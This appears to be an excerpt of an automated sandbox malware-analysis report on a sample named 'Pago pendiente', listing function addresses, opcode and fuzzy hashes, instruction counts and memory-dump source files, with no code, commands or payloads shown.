                                                          • Opcode ID: 34ac9ce438db7e3926b2cdf2a137063b1def3b0d8a38ba14b82fdcf9719c1c77
                                                          • Instruction ID: b40536dac17de002f9cc2de3ea5cce90d9633ca4a65bd6648710ae48f7b495e2
                                                          • Opcode Fuzzy Hash: 34ac9ce438db7e3926b2cdf2a137063b1def3b0d8a38ba14b82fdcf9719c1c77
                                                          • Instruction Fuzzy Hash: E9012B710443849AE7218F59CDC8B66BFD8DF43334F18C61AED098E287D2399948CA71
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0772B8C4 Relevance: .0, Instructions: 39COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d1b3743d9f8f09d4b749f86fcbd6c53f30e54eb2a158797ccf9bba228840f19b
                                                          • Instruction ID: 053e63838f556142bc55de8cff6cddd821b8a880a287c1cdfa2447615293b17f
                                                          • Opcode Fuzzy Hash: d1b3743d9f8f09d4b749f86fcbd6c53f30e54eb2a158797ccf9bba228840f19b
                                                          • Instruction Fuzzy Hash: 47015EF1C0026ACEEB14CFAAC4043ED7BB1BF05390F248629D464AA2A0E7744A46DFD0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0772C950 Relevance: .0, Instructions: 38COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bddaab5fe6298599c0449b7cfa040f3ec98eadd9f6a13bf119a477d49244d24a
                                                          • Instruction ID: 15e5a9c4216f28450d1c38ea48b5462bf99025a829cbaeae4a6130f64a81a7d9
                                                          • Opcode Fuzzy Hash: bddaab5fe6298599c0449b7cfa040f3ec98eadd9f6a13bf119a477d49244d24a
                                                          • Instruction Fuzzy Hash: 11F024F2A00119AFCF06CB64DC458AE7FB9EF84260B1481A7E458D7221F23089519760
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0772B969 Relevance: .0, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4808ce2124b78ac826715f5b02e9fb29f2d6b32fa4c4dc2e5570a11c0c9321b9
                                                          • Instruction ID: 7ba86273f231df16e7b9d93420c89427017c25f98b2b76859e215530013945f4
                                                          • Opcode Fuzzy Hash: 4808ce2124b78ac826715f5b02e9fb29f2d6b32fa4c4dc2e5570a11c0c9321b9
                                                          • Instruction Fuzzy Hash: B4F0E9F67001205F9304D66ED848D6BABE9FBC92603648079E50CC7310D9325C02D7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 018ED744 Relevance: .0, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2007451309.00000000018ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 018ED000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_18ed000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 20566448163b78847f11564f5dfedf2ffcf0bc62a478cdc79275eb1de9930396
                                                          • Instruction ID: d08a62ed60c5199b48dc7b5eaff7b33b3a69ac9a0cb9d441542d3518b9454c6d
                                                          • Opcode Fuzzy Hash: 20566448163b78847f11564f5dfedf2ffcf0bc62a478cdc79275eb1de9930396
                                                          • Instruction Fuzzy Hash: 53F062764043849AE7218F19CD88B66FFD8EB52734F18C55AED484A286C2799944CAB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07726ED0 Relevance: .0, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 948bff76123a3d2ea7e43212f5a2d8831b0aa7dce01679a4ce67b79dfd104436
                                                          • Instruction ID: 12004615486243ffb1607355c6aad19d6031849ebac451871883c8fb19663ed4
                                                          • Opcode Fuzzy Hash: 948bff76123a3d2ea7e43212f5a2d8831b0aa7dce01679a4ce67b79dfd104436
                                                          • Instruction Fuzzy Hash: B401AF78A00208AFCB44DFA9C588A9DBFF1AF48310F15C0A5E8489B361EA30EA40CF41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0772B8D0 Relevance: .0, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 31bc479f2ee5e4583fe7e684a7d679d60e5be847bf617789c9ca45cbabf2eff2
                                                          • Instruction ID: 32912c01ff02b12f7d3ec293c5fd57309b27b354f1ed2889ee5eb6e90f3b7f7f
                                                          • Opcode Fuzzy Hash: 31bc479f2ee5e4583fe7e684a7d679d60e5be847bf617789c9ca45cbabf2eff2
                                                          • Instruction Fuzzy Hash: 3701FFF0D00229DFDB14CF5AC4047AE7BF5BF45350F258629E464AA2A0E7744A45DFD1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0772B970 Relevance: .0, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6daf63165bd32b72a300e695cb001a3036c2cbe349f2a10796266f093c12f695
                                                          • Instruction ID: 6ce60667d5a88db86e3c27033ca2da5329a7b067da0ba06928f9fb33b7fa14f9
                                                          • Opcode Fuzzy Hash: 6daf63165bd32b72a300e695cb001a3036c2cbe349f2a10796266f093c12f695
                                                          • Instruction Fuzzy Hash: 31E039767001286F93049A6ED888C6BBBEEFBCD660361807AE908C7310DA31AD0086A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0772C960 Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f9f0f32aee466fff6c710e04c9eef80e39e7b707097ab6d88d5812aec2f58ac8
                                                          • Instruction ID: 66f35a5d6fa6cb9ea326e44021dd976c244bd779a93c756595f51bc3f08d1eff
                                                          • Opcode Fuzzy Hash: f9f0f32aee466fff6c710e04c9eef80e39e7b707097ab6d88d5812aec2f58ac8
                                                          • Instruction Fuzzy Hash: 8FF065B2600118BF9F08DF58D845D9E7FEAEF88260B14806AE408D7224E631E9519754
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07726526 Relevance: .0, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 480d9d253d341b2a34072793bb5e21e6c0f3f2c74493dc47d54daaf2a901d011
                                                          • Instruction ID: 15104b5d75cd45ffc7cc20e75e730343de2d77dbb20e321a393f98b0e3b9f32b
                                                          • Opcode Fuzzy Hash: 480d9d253d341b2a34072793bb5e21e6c0f3f2c74493dc47d54daaf2a901d011
                                                          • Instruction Fuzzy Hash: 18F05F74925228CFCB65CF64C994AD9BBB1FB09305F5002D6E449A7250DB30AE81CF00
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07726436 Relevance: .0, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c29febeecd071c61785ef7aa82a71b11d80692b81e1b200f72a16471dbed401c
                                                          • Instruction ID: b415ebd9ecd56adec35429f419773a1d61cd467459d41bb6567ca708d4a98136
                                                          • Opcode Fuzzy Hash: c29febeecd071c61785ef7aa82a71b11d80692b81e1b200f72a16471dbed401c
                                                          • Instruction Fuzzy Hash: BDF07478E163688FCB60CF65CA80B9ABBB1BF49700F1010D9E449AB355D7759E81CF00
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07723AA0 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 280a85a9f49ead0b3df1cd0bd2e174dad87d5cc4fcd2ee4ec89d1c0674f3f7be
                                                          • Instruction ID: db8c8884afdf52e410fec82b7d5157037870efed9ba7f389adb08677ae942886
                                                          • Opcode Fuzzy Hash: 280a85a9f49ead0b3df1cd0bd2e174dad87d5cc4fcd2ee4ec89d1c0674f3f7be
                                                          • Instruction Fuzzy Hash: 64E08CF18192918ED3939A78D909290BFB0EF13216F0A45E2F088DA261DA7A0985C752
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07725EE4 Relevance: .0, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f30cebf772198acab6435428d2278cae8dbd97859688ddb1eb08f1b3c39ccfe9
                                                          • Instruction ID: 6ff20d8faea2ea83b4dc2749850b68341f15c3e0b26a74af6c1d519e49f69914
                                                          • Opcode Fuzzy Hash: f30cebf772198acab6435428d2278cae8dbd97859688ddb1eb08f1b3c39ccfe9
                                                          • Instruction Fuzzy Hash: B2E04FF0525355CFC714DB61C045468BB75FF49355F601199E0539E224C735DD92CE44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07725E6C Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 852c3ac74bc9eead4680659b57699f00776dc775049f611a3b2afa5e536fa6f7
                                                          • Instruction ID: c3db5c182ed913b291e9deb125c72a003a99a2926df540ffed430d86f2af485c
                                                          • Opcode Fuzzy Hash: 852c3ac74bc9eead4680659b57699f00776dc775049f611a3b2afa5e536fa6f7
                                                          • Instruction Fuzzy Hash: FAE08C70526315CFCB54DFA1C449589BB70FF45340B1000E5E8569F268D7368E82CF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07723AB0 Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ca50902614ecb061bd44911350a901d4f2bf239584314fbc59348600bbdbc9b8
                                                          • Instruction ID: a0dda7b744f30a7ebc47016f9fd0ef5115d080f54fe4136d7eb192eea25f9424
                                                          • Opcode Fuzzy Hash: ca50902614ecb061bd44911350a901d4f2bf239584314fbc59348600bbdbc9b8
                                                          • Instruction Fuzzy Hash: 9DC080B04212199FC390EFB994097557FBCD70621AF004474F44CC3240DE750440D651
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0772411D Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 82dd4508620016c555e617e519dd49f9d88cdc5341084aa5fdbb60cdecd7ea43
                                                          • Instruction ID: 76d318b61ffd99cda189f3032ec7e0896eb09d4ead0c3d6e4d9d7daaf4009f52
                                                          • Opcode Fuzzy Hash: 82dd4508620016c555e617e519dd49f9d88cdc5341084aa5fdbb60cdecd7ea43
                                                          • Instruction Fuzzy Hash: 18D01270D125198BCB85DF24DC84A8CB776EF44200F10D595E01997520DA705E85CF04
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0772B23C Relevance: .0, Instructions: 8COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 78df535ac5c9384ea781faf039609f85ea70cb5ec79a9b1dcce9d7bf3f3bc6f4
                                                          • Instruction ID: b65be9217812a1b9dfd206f91e70dec5cb534782fad9db193bb02302cfcd0c40
                                                          • Opcode Fuzzy Hash: 78df535ac5c9384ea781faf039609f85ea70cb5ec79a9b1dcce9d7bf3f3bc6f4
                                                          • Instruction Fuzzy Hash: AEB012E71B9250F3820223A44C8583EA590FFB6780FD0DC06B2E4C00109930842AB23F
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 0772DAC6 Relevance: 4.0, Strings: 3, Instructions: 250COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: T+-q$[V~*$]\`
                                                          • API String ID: 0-3978741314
                                                          • Opcode ID: e6819987811fff59512b8a8cf5364be0389db637ae46f1e4cdd9ce931b2b9b1a
                                                          • Instruction ID: e21e5845bc088538cb2141dde1c0a27ab0debb8f862b8388f3f3f23e3cbc50bb
                                                          • Opcode Fuzzy Hash: e6819987811fff59512b8a8cf5364be0389db637ae46f1e4cdd9ce931b2b9b1a
                                                          • Instruction Fuzzy Hash: 5FA12CB4E156199FCB04CFAAD5818AEFBF2FF8A340F14D526D425BB218D73099028F64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07724E71 Relevance: 3.9, Strings: 3, Instructions: 158COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 7Z/t$RWIK$[[bb
                                                          • API String ID: 0-1157992699
                                                          • Opcode ID: f57ee13ca809e21c215f0a49c99f91c6e34fc379c82777b12ccac912ae8bff39
                                                          • Instruction ID: 6c8b44c45e33777cdafabab335a6d3d100ee3eb4eaffa16096aa3bd5ee7ea166
                                                          • Opcode Fuzzy Hash: f57ee13ca809e21c215f0a49c99f91c6e34fc379c82777b12ccac912ae8bff39
                                                          • Instruction Fuzzy Hash: B4515AB4E1525ADFDB08CFAAC4405AEFFF2EF89350F24D06AD025A7254D7344A428F94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07724E80 Relevance: 3.9, Strings: 3, Instructions: 155COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 7Z/t$RWIK$[[bb
                                                          • API String ID: 0-1157992699
                                                          • Opcode ID: a08946b2147a87fb79120b24670a0f01655446b39c77dd0ab2d990a5d941f5cf
                                                          • Instruction ID: 711de58c5ec79ef1d71d937bf7dd47528f06c4a1d177f46f78bf84ff1db2bc0b
                                                          • Opcode Fuzzy Hash: a08946b2147a87fb79120b24670a0f01655446b39c77dd0ab2d990a5d941f5cf
                                                          • Instruction Fuzzy Hash: E6515BB4E1525ADFDB08CFAAC4405AEFBF2FF89350F14D429D429A7254D7348A428F94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07A55260 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: "{B2
                                                          • API String ID: 0-2034451231
                                                          • Opcode ID: d97d49528c1a2c20046543766691d8e4b18e8ded1869d84b570b3b1890373c7c
                                                          • Instruction ID: 3be6f012bec553356202da19aaf00f8d3d03eff084465c3f10eded75746bb706
                                                          • Opcode Fuzzy Hash: d97d49528c1a2c20046543766691d8e4b18e8ded1869d84b570b3b1890373c7c
                                                          • Instruction Fuzzy Hash: 57E107B4E005598FCB14DFA9C5849AEBBB2FF89304F248169E814AB356DB34AD41CF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07723AE8 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0
                                                          • API String ID: 0-4108050209
                                                          • Opcode ID: 2d6ddd0668cca5d71d76434b9a79fc0ea89b95a387bc088bbcaa3956e93d85c7
                                                          • Instruction ID: da2a686104927512477263136688964793c7bc206bf1de8b54554b5c7ae02a48
                                                          • Opcode Fuzzy Hash: 2d6ddd0668cca5d71d76434b9a79fc0ea89b95a387bc088bbcaa3956e93d85c7
                                                          • Instruction Fuzzy Hash: 9E21DBB1E016189BEB58CFABD84079EFBF7AFC9200F14C0BAD518A6254EB341A458F51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07723AD8 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0
                                                          • API String ID: 0-4108050209
                                                          • Opcode ID: 982612ec4af9105e7e903f2ef33515235ba8f8bf39c0da77990d04b58c084647
                                                          • Instruction ID: 7623c0de545e29ae41f71b844ea08f50445ba64b81a508b7cd9705c054eb814d
                                                          • Opcode Fuzzy Hash: 982612ec4af9105e7e903f2ef33515235ba8f8bf39c0da77990d04b58c084647
                                                          • Instruction Fuzzy Hash: 2631FEB1E046588FEB59CF6BC85479EFBF3AFC9200F04C0BAD459A6254EB341A458F51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 058B0518 Relevance: .3, Instructions: 315COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2017789928.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58b0000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eedb82cc348ecc949369a8fa4ca9c631a7bafd342cdfae6d33cda9c3ca74ff17
                                                          • Instruction ID: e15d4c244a56acf1092c69e771276d41c7d7c61520271ba03721deb41d607484
                                                          • Opcode Fuzzy Hash: eedb82cc348ecc949369a8fa4ca9c631a7bafd342cdfae6d33cda9c3ca74ff17
                                                          • Instruction Fuzzy Hash: 581296B0423B568BE310CF69E98E1893FB1B745318F91C309E2625B2E5DFB4154AEF44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07A55698 Relevance: .3, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 843dcc4849ec0abc8e6a274eaf9c62351bba314ca1f774438a7464dd370ee959
                                                          • Instruction ID: b736f0e85985cf86a2536320e9912e9c8c80db6ed0fc0b6016032c92173287b5
                                                          • Opcode Fuzzy Hash: 843dcc4849ec0abc8e6a274eaf9c62351bba314ca1f774438a7464dd370ee959
                                                          • Instruction Fuzzy Hash: C1E118B4E005198FCB14DFA9C5849AEFBB2FF89304F248169E814AB355DB34AD41CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07A56EE8 Relevance: .3, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1a912778ddf8f6dba84cf8f704a4a629dc2770e843e448ee9077ddbe6a7c61b4
                                                          • Instruction ID: cbfddd69bcd44134312dc72a946dfd628d37bf8bb563110a9453117644c89e9a
                                                          • Opcode Fuzzy Hash: 1a912778ddf8f6dba84cf8f704a4a629dc2770e843e448ee9077ddbe6a7c61b4
                                                          • Instruction Fuzzy Hash: 53E1F5B4E045598FCB14DFA9C5849AEBBB2FF89304F248169E814AB355DB34AD41CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07A54E28 Relevance: .3, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2021048352.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7a50000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 67987963de4fab797e90906ac5e1ecad04869adfd1e7fa5b071504a2d2b1e58c
                                                          • Instruction ID: 3673ca34234d291bbfde46036552f778988ef85ae8fad12862880619d9820c8e
                                                          • Opcode Fuzzy Hash: 67987963de4fab797e90906ac5e1ecad04869adfd1e7fa5b071504a2d2b1e58c
                                                          • Instruction Fuzzy Hash: 0DE1F7B4E045598FCB14DFA9C5849AEFBB2FF89304F248169D814AB355DB34AD81CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0772BED8 Relevance: .3, Instructions: 272COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b42e10654ab509879fbb3d4d036fb662a5c6ef8174042d9372cbb8bb9e7459f8
                                                          • Instruction ID: c55d7661ec61e17aed6fe4d8fe4f7b8c61d6c6a9f876acbbeb03009d1c6e9526
                                                          • Opcode Fuzzy Hash: b42e10654ab509879fbb3d4d036fb662a5c6ef8174042d9372cbb8bb9e7459f8
                                                          • Instruction Fuzzy Hash: 49D13931D2075A8ACB11EBA8D9946D9B7B1FF96300F11C79AE4497B211EF706EC4CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0772BEE8 Relevance: .3, Instructions: 264COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fe7fd6ace50f78d233b52c7a09a551f1c686fc80d412f120c74adb25ffc90070
                                                          • Instruction ID: d1f6465a173aeca48f3035accf1c2a2e1d206636bbe4b5cb66822338f9bbd73c
                                                          • Opcode Fuzzy Hash: fe7fd6ace50f78d233b52c7a09a551f1c686fc80d412f120c74adb25ffc90070
                                                          • Instruction Fuzzy Hash: 6BD10631D2071A8ACB11EBA8D9946D9B7B1FF96300F51C79AE4497B211EF706EC4CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 031AD91C Relevance: .3, Instructions: 264COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2008310556.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_31a0000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3b9b3ad9d0369be15918ff93d8d3450c310ae75d0e54b5a60a5724261b9ba085
                                                          • Instruction ID: 3ac7925b3b193ddb688dd4c9c8d79dbb1d54228e3abe0bffa4763c31103f97c7
                                                          • Opcode Fuzzy Hash: 3b9b3ad9d0369be15918ff93d8d3450c310ae75d0e54b5a60a5724261b9ba085
                                                          • Instruction Fuzzy Hash: 5FA1703AE107058FCF15DFB8C8445DEBBB2FF89301B15856AE805AB261DB31E946CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 058B0510 Relevance: .2, Instructions: 216COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
